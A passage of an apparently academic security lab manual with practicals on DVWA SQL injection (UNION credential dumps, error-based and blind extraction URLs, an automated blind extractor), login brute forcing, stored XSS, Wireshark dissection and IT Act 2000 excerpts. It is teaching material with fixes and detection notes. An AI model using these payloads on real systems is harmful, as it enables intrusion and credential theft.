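SQLite differs from DVWA's MySQL in three details that change the payloads:
  comment marker is `--` not `#`; version() is sqlite_version();
  information_schema.tables/columns are sqlite_master/pragma_table_info.
"""
import sqlite3

SCHEMA = """
CREATE TABLE users (
    user_id INTEGER PRIMARY KEY, first_name TEXT, last_name TEXT,
    user TEXT, password TEXT);
INSERT INTO users VALUES
    (1, 'admin',  'admin', 'admin',   'hash-admin'),
    (2, 'Gordon', 'Brown', 'gordonb', 'hash-gordonb'),
    (3, 'Hack',   'Me',    '1337',    'hash-1337');
"""


def connect():
    """Fresh in-memory database seeded with the constructed rows above."""
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def lookup_vulnerable(db, user_id):
    """Concatenation: the input becomes part of the SQL text, as in DVWA low."""
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return db.execute(sql).fetchall()


def lookup_safe(db, user_id):
    """Parameterised: the input is bound as a value and never parsed as SQL."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return db.execute(sql, (user_id,)).fetchall()


# Step 5: WHERE user_id = '%' or '0'='0'  -> true for every row
DUMP_ALL = "%' or '0'='0"
# Step 6: 1=0 empties the real result, UNION appends a row of our own; its
# second column is rendered where the surname normally appears.
VERSION = "%' and 1=0 union select null, sqlite_version() --"
# Step 8: table names (sqlite_master stands in for information_schema.tables)
TABLES = ("%' and 1=0 union select null, name from sqlite_master "
          "where type='table' --")
# Step 10: column names of users, newline-joined like concat(...,0x0a,...)
COLUMNS = ("%' and 1=0 union select null, group_concat(name, char(10)) "
           "from pragma_table_info('users') --")
# Step 11: the credentials themselves
CREDS = ("%' and 1=0 union select null, first_name || char(10) || last_name "
         "|| char(10) || user || char(10) || password from users --")


def run_all():
    """Run every step; returns a dict so the results can be checked."""
    db = connect()
    return {
        "normal": lookup_vulnerable(db, "1"),
        "dump_all": lookup_vulnerable(db, DUMP_ALL),
        "version": lookup_vulnerable(db, VERSION),
        "tables": lookup_vulnerable(db, TABLES),
        "columns": lookup_vulnerable(db, COLUMNS),
        "creds": lookup_vulnerable(db, CREDS),
        "safe_dump_all": lookup_safe(db, DUMP_ALL),   # injection fails
        "safe_normal": lookup_safe(db, "1"),
    }


if __name__ == "__main__":
    for step, rows in run_all().items():
        print(f"--- {step}")
        for first, last in rows:
            print(f"First name: {first}\nSurname: {last}")
```

The UNION only works because the injected SELECT has the same number of columns (two) as the original; the null in the first position is how the attacker pads the row. With the parameterised query the whole payload is compared against user_id as one string, matches nothing, and the attack degrades to an empty result.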
PRACTICAL: 8

AIM: Analyze the Network Traffic using Wireshark. (Network Sniffer)

A packet sniffer, sometimes referred to as a network monitor or network analyzer, can be used by a
network or system administrator to monitor and troubleshoot network traffic. Using the information
captured by the packet sniffer an administrator can identify erroneous packets and use the data to
pinpoint bottlenecks and help maintain efficient network data transmission.

In its simplest form a packet sniffer captures all of the packets that pass through a given network
interface. By placing the interface in promiscuous mode, a malicious intruder on the same network
segment can capture and analyze all of the traffic, including the plain-text ncat session from
Practical 5 and any unencrypted logins.

Wireshark is a network protocol analyzer, popular for providing the minutest details about network
protocols, packet contents, decryption of protocols for which it is given the keys, etc. It can be used
on Windows, Linux, OS X, Solaris, FreeBSD, NetBSD and many other systems. The captured information can
be viewed through the GUI or through the TTY-mode TShark utility. Wireshark is free software, available
from https://www.wireshark.org.

Download and install Wireshark.

Steps to capture traffic:

1. Open Wireshark.
2. Select interface: go to the Capture option in the menu bar and select the interface.
3. Start capturing. Capturing requires administrator rights, and on a switched network you only see
traffic to, from or broadcast to your own machine unless the switch mirrors a port. Use a display
filter such as tcp.port == 4444 to show only the ncat traffic from Practical 5, then right-click a
packet and choose Follow > TCP Stream to reassemble the conversation and read the message that was
sent.
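What Wireshark's packet-details pane does for the first three layers, as an added example that is not Wireshark's code or this manual's: a dissector for an Ethernet II / IPv4 / TCP frame that also verifies the IPv4 header checksum. The frame it parses is constructed by the example itself (a TCP SYN from 10.0.0.5:40000 to 10.0.0.9:4444, addresses and MACs made up); a real capture would come from a raw socket or a pcap file.

```python
"""Dissect an Ethernet/IPv4/TCP frame the way Wireshark's first layers do.

Added example for this lab manual, not Wireshark code. build_sample_frame()
constructs the packet under test (addresses and MACs are made up for the
example); dissect() parses it back with the same field layout Wireshark
shows, and checks the IPv4 header checksum so a corrupted capture is noticed.
"""
import struct
import ipaddress

TCP_FLAGS = [(0x01, "FIN"), (0x02, "SYN"), (0x04, "RST"), (0x08, "PSH"),
             (0x10, "ACK"), (0x20, "URG")]


def ipv4_checksum(header):
    """RFC 791 one's-complement sum over the header (checksum field zeroed)."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:                       # fold carries back in
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_sample_frame():
    """Constructed sample: Ethernet II + IPv4 + TCP SYN, no payload."""
    src_mac = bytes.fromhex("001122334455")
    dst_mac = bytes.fromhex("66778899aabb")
    eth = dst_mac + src_mac + struct.pack("!H", 0x0800)      # EtherType IPv4

    tcp = struct.pack("!HHIIBBHHH",
                      40000, 4444,        # source port, destination port
                      1000, 0,            # seq, ack
                      5 << 4, 0x02,       # data offset = 5 words, flags = SYN
                      65535, 0, 0)        # window, checksum (left 0), urgent

    total_len = 20 + len(tcp)
    ip_no_sum = struct.pack("!BBHHHBBH4s4s",
                            0x45, 0, total_len, 0x1234, 0x4000,  # DF bit set
                            64, 6, 0,                            # TTL, TCP, csum
                            ipaddress.IPv4Address("10.0.0.5").packed,
                            ipaddress.IPv4Address("10.0.0.9").packed)
    csum = ipv4_checksum(ip_no_sum)
    ip = ip_no_sum[:10] + struct.pack("!H", csum) + ip_no_sum[12:]
    return eth + ip + tcp


def dissect(frame):
    """Return the fields Wireshark would list, keyed by its filter names."""
    dst_mac, src_mac, ethertype = struct.unpack("!6s6sH", frame[:14])
    if ethertype != 0x0800:
        raise ValueError(f"not IPv4: ethertype 0x{ethertype:04x}")
    ip = frame[14:]
    (ver_ihl, _tos, total_len, _ident, _flags_frag, ttl, proto, csum,
     src, dst) = struct.unpack("!BBHHHBBH4s4s", ip[:20])
    ihl = (ver_ihl & 0x0F) * 4
    header = ip[:ihl]
    checksum_ok = ipv4_checksum(header[:10] + b"\x00\x00" + header[12:]) == csum
    out = {
        "eth.src": src_mac.hex(":"), "eth.dst": dst_mac.hex(":"),
        "ip.src": str(ipaddress.IPv4Address(src)),
        "ip.dst": str(ipaddress.IPv4Address(dst)),
        "ip.ttl": ttl, "ip.proto": proto, "ip.checksum_ok": checksum_ok,
    }
    if proto == 6:                            # TCP
        sport, dport, seq, _ack, off, flags, win = struct.unpack(
            "!HHIIBBH", ip[ihl:ihl + 16])
        data_start = ihl + (off >> 4) * 4
        out.update({
            "tcp.srcport": sport, "tcp.dstport": dport, "tcp.seq": seq,
            "tcp.window": win,
            "tcp.flags": [name for bit, name in TCP_FLAGS if flags & bit],
            "tcp.payload": ip[data_start:total_len],
        })
    return out


if __name__ == "__main__":
    for key, value in dissect(build_sample_frame()).items():
        print(f"{key:16} {value}")
```

The keys are deliberately Wireshark's display-filter names, so what the code prints is what you would type into the filter bar: ip.src == 10.0.0.5 or tcp.flags.syn == 1 select the same packet in the GUI.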
PRACTICAL: 9

Aim: The Practice of Web Application Penetration Testing.

1. Building a Testing Environment

Intruding into websites is illegal in many countries, so you cannot take other people's web sites as
your testing target.
First, build a test environment for yourself. If you are not good at building servers, we
recommend a simple one built with XAMPP.
OS: Windows 7, 8
Software: XAMPP for Windows, download:
https://www.apachefriends.org/zh_cn/index.html

XAMPP for Windows has modules such as Apache, PHP, Tomcat and MySQL. The default installation path is
c:\xampp; please do not change it.
Taking DVWA (Damn Vulnerable Web Application) as an example: start Apache and MySQL, and access
http://127.0.0.1 .
After it has started, use the following command to set the MySQL root password to 123456 (this is a
weak password, only for the example; please change it, and never expose this machine to a network you
do not control, since DVWA is vulnerable by design):
C:\xampp\mysql\bin\mysqladmin -u root password 123456
Now download DVWA from https://github.com/RandomStorm/DVWA , unzip it to
C:\xampp\htdocs\dvwa,
then modify its configuration file, which is
C:\xampp\htdocs\dvwa\config\config.inc.php:
$_DVWA[ 'db_server' ] = 'localhost';
$_DVWA[ 'db_database' ] = 'dvwa';
$_DVWA[ 'db_user' ] = 'root';
$_DVWA[ 'db_password' ] = '123456';
$_DVWA[ 'default_security_level' ] = 'low';
Open http://127.0.0.1/dvwa/setup.php
Click "Create/Reset Database" to finish the installation.
Access the front page and it will redirect to
http://127.0.0.1/DVWA/login.php
Now a basic test environment is available.
2. DVWA Brute Force
The first challenge of DVWA is how to log in. Usually you can search the network for the default
username/password, or try to use SQL injection to bypass the authentication mechanism, for example
with a username like admin';-- , or other ways.
Here we will use brute force, with WebCruiser Web Vulnerability Scanner 3
(http://www.janusec.com/ ) as the brute-force tool.
First, input any username and password, such as 123 and 456, and submit.

Switch to the Resend tab:

We find a request list which includes the requests we have just submitted. Note that there is a
button "Bruter"; click it and it switches to the Bruter tool.
The username and password fields have been identified automatically.
The dictionary files are located in the same directory as WebCruiserWVS.exe and can be modified.

Click "Go" to start the guessing process; the results are listed in the window.
Log in with the username and password found.
3. SQL Injection
Select the "SQL Injection" menu, input 1 and submit:
Input 1' to try:

MySQL throws an error because of the unpaired single quote.

Now we can suspect that there is a SQL injection vulnerability here. Continue by trying 1 and 1=1 and
1 and 1=2.

We find the result is not as expected (both behave the same), so SQL injection of integer type is
ruled out. Continue by trying 1' and '1'='1 and 1' and '1'='2.
No result is returned when we input 1' and '1'='2.

So we can conclude that there is a SQL injection vulnerability of string type here. Recap:
Criterion of SQL Injection
Assume the initial response is Response0, the response after appending a true condition is Response1,
and the response after appending a false condition is Response2.
If Response1 = Response0, but Response1 != Response2, SQL injection exists. OK, can you take over
some data by exploiting it?
Try: http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select 1 from ( select
count(*),concat((select database()),0x3a,floor(rand(0)*2)) x from information_schema.tables group by
x)a)%23

Well, the database name "dvwa" is returned on the page.

This case is a little complex; it deliberately provokes a MySQL error. floor(rand(0)*2) is evaluated
twice per row when it is used as a GROUP BY key, which yields a duplicate key, and MySQL's "Duplicate
entry ... for key 'group_key'" error message echoes that key, which we built from the database name.
(%23 is the URL encoding of #, the MySQL comment marker that discards the rest of the original query.)
Another way is blind SQL injection: guess the length, and then the ASCII code of each byte, of the
field. To test whether the length of the database name is bigger than 10:
http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select char_length(database()))>10 and '1'='1

No row comes back, so the length is not bigger than 10; continue guessing until:
http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select char_length(database()))=4 and '1'='1

The normal row is returned, so the length is 4.

Continue to guess each byte of it (%271%27=%271 is the URL encoding of '1'='1):
http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select ord(substr(database(),1,1)))=100 and %271%27=%271
The ASCII code of the first byte is 100, which is d, and so on.
http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select ord(substr(database(),2,1)))=118 and %271%27=%271 , the second byte is v.
http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select ord(substr(database(),3,1)))=119 and %271%27=%271 , the third byte is w.
http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select ord(substr(database(),4,1)))=97 and %271%27=%271 , the fourth byte is a.
The full name of the database is "dvwa".
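The blind extraction above automated, as an added example that is not DVWA's, WebCruiser's or this manual's code. The manual tests one candidate value per request (=100, =118, ...); this example generalises the same true/false oracle into a binary search, so each byte costs 7 requests instead of up to 128. The target is an in-memory SQLite database constructed here (the secret it extracts is a made-up password string), so the run is offline; SQLite's length() and unicode(substr()) stand in for MySQL's char_length() and ord(substr()) from the URLs above.

```python
"""Boolean-based blind SQL injection, automated with binary search.

Added example for this lab manual; not DVWA or WebCruiser code. The oracle
models the vulnerable page: id=1' and (<condition>) and '1'='1 returns the
normal row when the condition is true and nothing when it is false. Instead
of testing one candidate value per request, each unknown (the length, then
every character code) is found by binary search over its range.
"""
import sqlite3

SECRET = "s3cr3t-hash"        # constructed; what the attacker does not know


def make_target():
    """In-memory stand-in for the vulnerable application's database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, "
               "user TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES (1, 'admin', 'admin', ?)", (SECRET,))
    return db


class Oracle:
    """One 'request' per ask(): True if the page showed the row,  else False."""

    def __init__(self, db):
        self.db = db
        self.requests = 0

    def ask(self, condition):
        self.requests += 1
        sql = ("SELECT first_name FROM users WHERE user_id = '1' and ("
               + condition + ") and '1'='1'")          # the app's own quoting
        return len(self.db.execute(sql).fetchall()) > 0


# The value to extract; MySQL equivalent on DVWA would be e.g. database().
EXPR = "(select password from users where user='admin')"


def bisect(oracle, greater_than, lo, hi):
    """Smallest v in [lo, hi] for which greater_than(v) is False, i.e. the
    value itself, using the oracle as a '> mid' comparison."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle.ask(greater_than(mid)):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_length(oracle, expr, max_len=64):
    # MySQL: char_length(expr) > mid
    return bisect(oracle, lambda m: f"length({expr}) > {m}", 0, max_len)


def extract_char(oracle, expr, pos):
    # MySQL: ord(substr(expr, pos, 1)) > mid
    code = bisect(oracle, lambda m: f"unicode(substr({expr},{pos},1)) > {m}",
                  0, 127)
    return chr(code)


def extract(oracle, expr):
    """Recover the whole string: length first, then one character at a time."""
    n = extract_length(oracle, expr)
    return "".join(extract_char(oracle, expr, i) for i in range(1, n + 1))


if __name__ == "__main__":
    o = Oracle(make_target())
    print(extract(o, EXPR), "in", o.requests, "requests")
```

The request count is what a defender should notice: a blind extraction is a burst of near-identical requests to one parameter differing only in a number, which is easy to spot in web server logs even though no individual request looks malicious.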
Is there a tool which can do these tests instead?
Yes, we can use a web application security scanner to do it.
Take WebCruiser as an illustration, navigate page and click “ScanURL”:
SQL Injection vulnerabilities found. Right click vulnerability and select “SQL INJECTION POC”,
Continue click ”Get Environment Information”:
4. XSS
Select XSS from the menu: http://127.0.0.1/dvwa/vulnerabilities/xss_s/

Input text and script directly into the title and content fields, such as:
testinput<img src=0 onerror="alert(123456)">
Or use the scanner; it finds 2 XSS vulnerabilities.
Note: To improve efficiency, WebCruiser Web Vulnerability Scanner can scan a designated vulnerability type (Setting) or a designated URL (ScanURL button) separately.
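The stored XSS above works because the guestbook writes the saved title and content back into the page unchanged. As an added example, not code from the manual or from DVWA, the Python below renders a constructed guestbook entry two ways, once by plain concatenation and once with HTML-escaped fields, and then runs an HTMLParser-based check over the rendered markup to report any tag that carries an on* event handler, a javascript: URL or a script element. The entry contents and both renderers are constructed for the example; the check is how a reviewer would confirm that the hardened output is actually inert rather than trusting the escaping call by inspection.

```python
import html
from html.parser import HTMLParser

# Constructed guestbook entries; the second uses the payload shape from the walkthrough.
SAMPLE_ENTRIES = [
    {"name": "alice", "message": "Hello from the lab"},
    {"name": 'testinput<img src=0 onerror="alert(123456)">', "message": "x"},
]


def render_unsafe(entry):
    """Interpolates stored fields straight into HTML, as the vulnerable guestbook does."""
    return f'<div class="entry"><b>{entry["name"]}</b>: {entry["message"]}</div>'


def render_safe(entry):
    """Escapes each field for HTML body context, so stored markup is shown as text."""
    return ('<div class="entry"><b>' + html.escape(entry["name"], quote=True)
            + "</b>: " + html.escape(entry["message"], quote=True) + "</div>")


class ActiveContentFinder(HTMLParser):
    """Collects tags and attributes that can run script when the markup is rendered."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append((tag, None))
        for name, value in attrs:
            # Any on* attribute (onerror, onload, ...) is an inline event handler.
            if name.startswith("on"):
                self.findings.append((tag, name))
            # URL-bearing attributes with a javascript: scheme also execute.
            elif name in ("src", "href") and value and value.strip().lower().startswith("javascript:"):
                self.findings.append((tag, name))


def active_content(markup):
    """Return [(tag, attribute_or_None), ...] for every executable construct in markup."""
    finder = ActiveContentFinder()
    finder.feed(markup)
    finder.close()
    return finder.findings


def audit(entries, renderer):
    """Render every entry with the given renderer and list the findings per entry."""
    return [active_content(renderer(e)) for e in entries]


if __name__ == "__main__":
    for label, renderer in (("unsafe", render_unsafe), ("safe", render_safe)):
        for entry, findings in zip(SAMPLE_ENTRIES, audit(SAMPLE_ENTRIES, renderer)):
            print(f"{label:6} {entry['name'][:20]!r:24} -> {findings or 'no active content'}")
```

On the constructed entries the unsafe renderer yields an img element carrying an onerror handler, while the escaped renderer yields none; the first, benign entry is reported clean either way. Escaping in this form is correct for text placed in element content and in quoted attribute values; placing user data inside a script block or an unquoted attribute needs a different encoding, which is why the check runs on the final markup rather than on the input.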
PRACTICAL: 10

AIM: Case Study on Indian IT ACT 2000.

An Act to provide legal recognition for transactions carried out by means of electronic data interchange
and other means of electronic communication, commonly referred to as "electronic commerce", which
involve the use of alternatives to paper-based methods of communication and storage of information, to
facilitate electronic filing of documents with the Government agencies.

Some sections of the IT Act are described below.

43. Penalty for damage to computer, computer system, etc.

If any person without permission of the owner or any other person who is in charge of a computer,
computer system or computer network, —

(a) Accesses or secures access to such computer, computer system or computer network;

(b) Downloads, copies or extracts any data, computer data base or information from such computer, computer system or computer network including information or data held or stored in any removable storage medium;

(c) Introduces or causes to be introduced any computer contaminant or computer virus into any
computer, computer system or computer network;

(d) Damages or causes to be damaged any computer, computer system or computer network, data, computer data base or any other programmes residing in such computer, computer system or computer network;

(e) Disrupts or causes disruption of any computer, computer system or computer network;

(f) Denies or causes the denial of access to any person authorized to access any computer, computer
system or computer network by any means;
(g) Provides any assistance to any person to facilitate access to a computer, computer system or computer network in contravention of the provisions of this Act, rules or regulations made thereunder;

(h) Charges the services availed of by a person to the account of another person by tampering with or manipulating any computer, computer system, or computer network, he shall be liable to pay damages by way of compensation not exceeding one crore rupees to the person so affected.

Explanation.- For the purposes of this section,—

(i) "Computer contaminant" means any set of computer instructions that are designed—

(a) To modify, destroy, record, transmit data or programme residing within a computer, computer system or computer network; or

(b) By any means to usurp the normal operation of the computer, computer system, or computer
network;

(ii) "computer data base" means a representation of information, knowledge, facts, concepts or instructions in text, image, audio, video that are being prepared or have been prepared in a formalized manner or have been produced by a computer, computer system or computer network and are intended for use in a computer, computer system or computer network;

(iii) "computer virus" means any computer instruction, information, data or programme that destroys, damages, degrades or adversely affects the performance of a computer resource or attaches itself to another computer resource and operates when a programme, data or instruction is executed or some other event takes place in that computer resource;

(iv) "Damage" means to destroy, alter, delete, add, modify or rearrange any computer resource by any
means.

44. Penalty for failure to furnish information, return, etc.

If any person who is required under this Act or any rules or regulations made thereunder to—

(a) Furnish any document, return or report to the Controller or the Certifying Authority fails to furnish the same, he shall be liable to a penalty not exceeding one lakh and fifty thousand rupees for each such failure;

(b) File any return or furnish any information, books or other documents within the time specified therefor in the regulations fails to file return or furnish the same within the time specified therefor in the regulations, he shall be liable to a penalty not exceeding five thousand rupees for every day during which such failure continues;

(c) Maintain books of account or records, fails to maintain the same, he shall be liable to a penalty not
exceeding ten thousand rupees for every day during which the failure continues.

52. Salary, allowances and other terms and conditions of service of Presiding Officer.

The salary and allowances payable to, and the other terms and conditions of service including pension, gratuity and other retirement benefits of, the Presiding Officer of Cyber Appellate Tribunal shall be such as may be prescribed: Provided that neither the salary and allowances nor the other terms and conditions of service of the Presiding Officer shall be varied to his disadvantage after appointment.

61. Civil court not to have jurisdiction.

No court shall have jurisdiction to entertain any suit or proceeding in respect of any matter which an
adjudicating officer appointed under this Act or the Cyber Appellate Tribunal constituted under this
Act is empowered by or under this Act to determine and no injunction shall be granted by any court or
other authority in respect of any action taken or to be taken in pursuance of any power conferred by or
under this Act.

62. Appeal to High Court.

Any person aggrieved by any decision or order of the Cyber Appellate Tribunal may file an appeal to the High Court within sixty days from the date of communication of the decision or order of the Cyber Appellate Tribunal to him on any question of fact or law arising out of such order: Provided that the High Court may, if it is satisfied that the appellant was prevented by sufficient cause from filing the appeal within the said period, allow it to be filed within a further period not exceeding sixty days.

64. Recovery of penalty

A penalty imposed under this Act, if it is not paid, shall be recovered as an arrear of land revenue and the license or the Digital Signature Certificate, as the case may be, shall be suspended till the penalty is paid.

65. Tampering with computer source documents.

Whoever knowingly or intentionally conceals, destroys or alters or intentionally or knowingly causes another to conceal, destroy or alter any computer source code used for a computer, computer programme, computer system or computer network, when the computer source code is required to be kept or maintained by law for the time being in force, shall be punishable with imprisonment up to three years, or with fine which may extend up to two lakh rupees, or with both.

Explanation.—For the purposes of this section, "computer source code" means the listing of programmes, computer commands, design and layout and programme analysis of computer resource in any form.

66. Hacking with computer system.

(1) Whoever with the intent to cause or knowing that he is likely to cause wrongful loss or damage to the public or any person destroys or deletes or alters any information residing in a computer resource or diminishes its value or utility or affects it injuriously by any means, commits hacking.

(2) Whoever commits hacking shall be punished with imprisonment up to three years, or with fine
which may extend up to two lakh rupees, or with both.

67. Publishing of information which is obscene in electronic form.

Whoever publishes or transmits or causes to be published in the electronic form, any material which is lascivious or appeals to the prurient interest or if its effect is such as to tend to deprave and corrupt persons who are likely, having regard to all relevant circumstances, to read, see or hear the matter contained or embodied in it, shall be punished on first conviction with imprisonment of either description for a term which may extend to five years and with fine which may extend to one lakh rupees and in the event of a second or subsequent conviction with imprisonment of either description for a term which may extend to ten years and also with fine which may extend to two lakh rupees.

68. Power of Controller to give directions.

(1) The Controller may, by order, direct a Certifying Authority or any employee of such Authority to take such measures or cease carrying on such activities as specified in the order if those are necessary to ensure compliance with the provisions of this Act, rules or any regulations made thereunder.

(2) Any person who fails to comply with any order under sub-section (1) shall be guilty of an offence and shall be liable on conviction to imprisonment for a term not exceeding three years or to a fine not exceeding two lakh rupees or to both.

69. Directions of Controller to a subscriber to extend facilities to decrypt information.

(1) If the Controller is satisfied that it is necessary or expedient so to do in the interest of the sovereignty or integrity of India, the security of the State, friendly relations with foreign States or public order or for preventing incitement to the commission of any cognizable offence, for reasons to be recorded in writing, by order, direct any agency of the Government to intercept any information transmitted through any computer resource.

(2) The subscriber or any person in charge of the computer resource shall, when called upon by any agency which has been directed under sub-section (1), extend all facilities and technical assistance to decrypt the information.

70. Protected system.

(1) The appropriate Government may, by notification in the Official Gazette, declare that any
computer, computer system or computer network to be a protected system.

(2) The appropriate Government may, by order in writing, authorize the persons who are authorized to access protected systems notified under sub-section (1).

(3) Any person who secures access or attempts to secure access to a protected system in contravention of the provisions of this section shall be punished with imprisonment of either description for a term which may extend to ten years and shall also be liable to fine.

71. Penalty for misrepresentation.

Whoever makes any misrepresentation to, or suppresses any material fact from, the Controller or the Certifying Authority for obtaining any license or Digital Signature Certificate, as the case may be, shall be punished with imprisonment for a term which may extend to two years, or with fine which may extend to one lakh rupees, or with both.

72. Penalty for breach of confidentiality and privacy.

Save as otherwise provided in this Act or any other law for the time being in force, any person who, in pursuance of any of the powers conferred under this Act, rules or regulations made thereunder, has secured access to any electronic record, book, register, correspondence, information, document or other material without the consent of the person concerned discloses such electronic record, book, register, correspondence, information, document or other material to any other person shall be punished with imprisonment for a term which may extend to two years, or with fine which may extend to one lakh rupees, or with both.

73. Penalty for publishing Digital Signature Certificate false in certain particulars.

(1) No person shall publish a Digital Signature Certificate or otherwise make it available to any other person with the knowledge that—

(a) The Certifying Authority listed in the certificate has not issued it; or

(b) The subscriber listed in the certificate has not accepted it; or

(c) The certificate has been revoked or suspended, unless such publication is for the purpose of
verifying a digital signature created prior to such suspension or revocation.
(2) Any person who contravenes the provisions of sub-section (1) shall be punished with
imprisonment for a term which may extend to two years, or with fine which may extend to one lakh
rupees, or with both.

74. Publication for fraudulent purpose.

Whoever knowingly creates, publishes or otherwise makes available a Digital Signature Certificate for
any fraudulent or unlawful purpose shall be punished with imprisonment for a term which may extend
to two years, or with fine which may extend to one lakh rupees, or with both.

75. Act to apply for offence or contravention committed outside India.

(1) Subject to the provisions of sub-section (2), the provisions of this Act shall apply also to any
offence or contravention committed outside India by any person irrespective of his nationality.

(2) For the purposes of sub-section (1), this Act shall apply to an offence or contravention committed outside India by any person if the act or conduct constituting the offence or contravention involves a computer, computer system or computer network located in India.

76. Confiscation.

Any computer, computer system, floppies, compact disks, tape drives or any other accessories related thereto, in respect of which any provision of this Act, rules, orders or regulations made thereunder has been or is being contravened, shall be liable to confiscation: Provided that where it is established to the satisfaction of the court adjudicating the confiscation that the person in whose possession, power or control of any such computer, computer system, floppies, compact disks, tape drives or any other accessories relating thereto is found is not responsible for the contravention of the provisions of this Act, rules, orders or regulations made thereunder, the court may, instead of making an order for confiscation of such computer, computer system, floppies, compact disks, tape drives or any other accessories related thereto, make such other order authorized by this Act against the person contravening the provisions of this Act, rules, orders or regulations made thereunder as it may think fit.

77. Penalties or confiscation not to interfere with other punishments.

No penalty imposed or confiscation made under this Act shall prevent the imposition of any other
punishment to which the person affected thereby is liable under any other law for the time being in
force.

78. Power to investigate offences.

Notwithstanding anything contained in the Code of Criminal Procedure, 1973, a police officer not
below the rank of Deputy Superintendent of Police shall investigate any offence under this Act.

NETWORK SERVICE PROVIDERS NOT TO BE LIABLE IN CERTAIN CASES

79. Network service providers not to be liable in certain cases.

For the removal of doubts, it is hereby declared that no person providing any service as a network
service provider shall be liable under this Act, rules or regulations made thereunder for any third party
information or data made available by him if he proves that the offence or contravention was
committed without his knowledge or that he had exercised all due diligence to prevent the commission
of such offence or contravention.

Explanation.—for the purposes of this section, —

(a) "Network service provider" means an intermediary;

(b) "Third party information" means any information dealt with by a network service provider in his
capacity as an intermediary;

80. Power of police officer and other officers to enter, search, etc.

(1) Notwithstanding anything contained in the Code of Criminal Procedure, 1973, any police officer, not below the rank of a Deputy Superintendent of Police, or any other officer of the Central Government or a State Government authorized by the Central Government in this behalf may enter any public place and search and arrest without warrant any person found therein who is reasonably suspected of having committed or of committing or of being about to commit any offence under this Act.

Explanation.—For the purposes of this sub-section, the expression "public place" includes any public conveyance, any hotel, any shop or any other place intended for use by, or accessible to the public.

(2) Where any person is arrested under sub-section (1) by an officer other than a police officer, such
officer shall, without unnecessary delay, take or send the person arrested before a magistrate having
jurisdiction in the case or before the officer-in-charge of a police station.

(3) The provisions of the Code of Criminal Procedure, 1973 shall, subject to the provisions of this
section, apply, so far as may be, in relation to any entry, search or arrest, made under this section.

81. Act to have overriding effect.

The provisions of this Act shall have effect notwithstanding anything inconsistent therewith contained
in any other law for the time being in force.

82. Controller, Deputy Controller and Assistant Controllers to be public servants.

The Presiding Officer and other officers and employees of a Cyber Appellate Tribunal, the Controller, the Deputy Controller and the Assistant Controllers shall be deemed to be public servants within the meaning of section 21 of the Indian Penal Code.

83. Power to give directions.

The Central Government may give directions to any State Government as to the carrying into
execution in the State of any of the provisions of this Act or of any rule, regulation or order made
thereunder.

84. Protection of action taken in good faith.

No suit, prosecution or other legal proceeding shall lie against the Central Government, the State Government, the Controller or any person acting on behalf of him, the Presiding Officer, adjudicating officers and the staff of the Cyber Appellate Tribunal for anything which is in good faith done or intended to be done in pursuance of this Act or any rule, regulation or order made thereunder.

85. Offences by companies.

(1) Where a person committing a contravention of any of the provisions of this Act or of any rule,
direction or order made thereunder is a company, every person who, at the time the contravention was
committed, was in charge of, and was responsible to, the company for the conduct of business of the
company as well as the company, shall be guilty of the contravention and shall be liable to be
proceeded against and punished accordingly:

Provided that nothing contained in this sub-section shall render any such person liable to punishment if he proves that the contravention took place without his knowledge or that he exercised all due diligence to prevent such contravention.

(2) Notwithstanding anything contained in sub-section (1), where a contravention of any of the provisions of this Act or of any rule, direction or order made thereunder has been committed by a company and it is proved that the contravention has taken place with the consent or connivance of, or is attributable to any neglect on the part of, any director, manager, secretary or other officer of the company, such director, manager, secretary or other officer shall also be deemed to be guilty of the contravention and shall be liable to be proceeded against and punished accordingly.

Explanation. —for the purposes of this section, —

(i) "Company" means any body corporate and includes a firm or other association of individuals; and

(ii) "Director", in relation to a firm, means a partner in the firm.

86. Removal of difficulties.

(1) If any difficulty arises in giving effect to the provisions of this Act, the Central Government may, by order published in the Official Gazette, make such provisions not inconsistent with the provisions of this Act as appear to it to be necessary or expedient for removing the difficulty:

Provided that no order shall be made under this section after the expiry of a period of two years from the commencement of this Act.

(2) Every order made under this section shall be laid, as soon as may be after it is made, before each House of Parliament.
